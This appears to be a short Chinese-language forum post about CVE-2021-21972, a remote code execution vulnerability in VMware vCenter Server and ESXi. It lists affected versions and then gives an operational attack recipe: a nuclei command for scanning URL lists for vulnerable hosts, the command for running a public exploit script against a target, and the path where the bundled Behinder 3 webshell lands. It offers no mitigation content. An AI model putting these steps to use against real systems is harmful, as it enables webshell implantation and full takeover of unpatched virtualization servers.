- 注册
- 09 10, 2024
- 消息
- 186
JavaScript:
## 漏洞概述
攻击者可通过访问web管理端向vCenter Server发送请求从而在操作系统上执行任意命令或者上传一个webshell到vcenter服务器的任意位置执行.
## 漏洞影响
```http
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
VMware ESXi 7.0系列 < ESXi70U1c-17325551
VMware ESXi 6.7系列 < ESXi670-202102401-SG
VMware ESXi 6.5系列 < ESXi650-202102101-SG
```
## POC
```bash
nuclei -tags vmware -t cves/ -l urls.txt
Goby(需导入佩奇文库的POC)
```
## EXP
[@NS-Sp4ce](https://github.com/NS-Sp4ce/CVE-2021-21972)
```bash
python CVE-2021-21972.py -url https://192.168.2.1
```
`payload`文件夹内的`tar`文件为默认冰蝎3 webshell
```http
https://domain.com/ui/resources/shell.jsp
```